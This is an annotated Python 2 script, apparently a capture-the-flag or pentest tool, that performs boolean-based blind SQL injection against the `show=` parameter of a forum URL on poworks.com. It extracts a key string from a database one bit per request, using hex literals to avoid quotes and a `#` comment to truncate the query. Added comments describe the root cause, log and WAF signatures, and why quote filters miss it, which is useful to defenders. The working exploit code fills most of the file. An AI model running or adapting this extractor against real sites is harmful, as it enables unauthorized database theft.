
#!/usr/bin/python
#
# Boolean-based blind SQL injection extractor (Python 2: urllib2, print
# statement). It reads the result of the SQL in `target` one character at a
# time and one bit per HTTP request, using the presence of a fixed string in
# the response page as the true/false oracle.
#
# Defender's notes (what this traffic looks like and why it works):
#   - the payload is appended to the `show=` query parameter, which the server
#     is presumably interpolating into a SQL statement unescaped; that is the
#     root cause, and parameterized queries / prepared statements remove the
#     whole class of issue;
#   - every extracted character costs 7 sequential requests to the same URL
#     whose `show=` value differs only in one integer; the substring
#     `lpad(bin(ascii(substr(` (URL-encoded on the wire) and the trailing `#`
#     (MySQL end-of-line comment) are reliable log-search / WAF signatures;
#   - string constants are hex literals (0x...), so no quote character appears
#     in the request -- a quote-based filter alone does not catch this.


import urllib2,urllib,time  # `time` is imported but never used below

# select database()

#query = "1 and (substr((lpad(bin(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),7,0)),1,1)=1)"

#5F5F5F5F5F5F5F5F5F5F5F5F313339313533363335

# The inner SELECT whose (string) result is leaked. The LIKE pattern is a hex
# literal; in MySQL, `_` inside a LIKE pattern matches any single character.
target = "select group_concat(keystr) from KeyDB.kt1509 where signature like 0x3234306136346465633530615F5F5F5F5F5F5F5F"

x = 0  # 1-based index of the character currently being extracted

answer = ""  # characters recovered so far


# NOTE: the indentation of this paste is lost; the nesting below is inferred
# from the control-flow keywords (while > for > if/else, then the `ch == 0`
# test back at the while level).
while 1:

x +=1

ch = 0  # 7-bit value of character x, assembled one bit per request


for i in range(1,8):

url = "http://poworks.com/index.php/forum/?cid=0&show="

#att = "1 and ascii(substr((%s),%d,1))=%d"%(target,x,i)

# Condition sent to the server: "bit i (MSB first) of the 7-bit binary form of
# character x of `target`'s result is 1". The trailing `#` comments out
# whatever the server's own SQL appends after the injected value.
att = "1 and (substr((select lpad( bin( ascii(substr((%s),%d,1)) ),7,0)) ,%d,1)=1)#"%(target,x,i)

att = urllib.quote(att)

url += att

req = urllib2.Request(url)

# No timeout and no error handling: any network or HTTP error raises out of
# the loop and aborts the whole run.
result = urllib2.urlopen(req).read()

#print result

# Oracle: the page text differs between a true and a false WHERE clause. The
# marker string is specific to this page; its presence is read as "true".
r = result.find("No replies posted yet.")

if r > -1:

ch += 2**(7-i)  # set bit (7-i): i=1 is the MSB (value 64), i=7 the LSB

else:

pass


# In MySQL, substr() past the end of the string yields '' and ascii('') is 0,
# so an all-zero character marks the end of the result.
if ch == 0:


break


else:


answer += chr(ch)


print ":) : "+ answer



print "END : ",answer


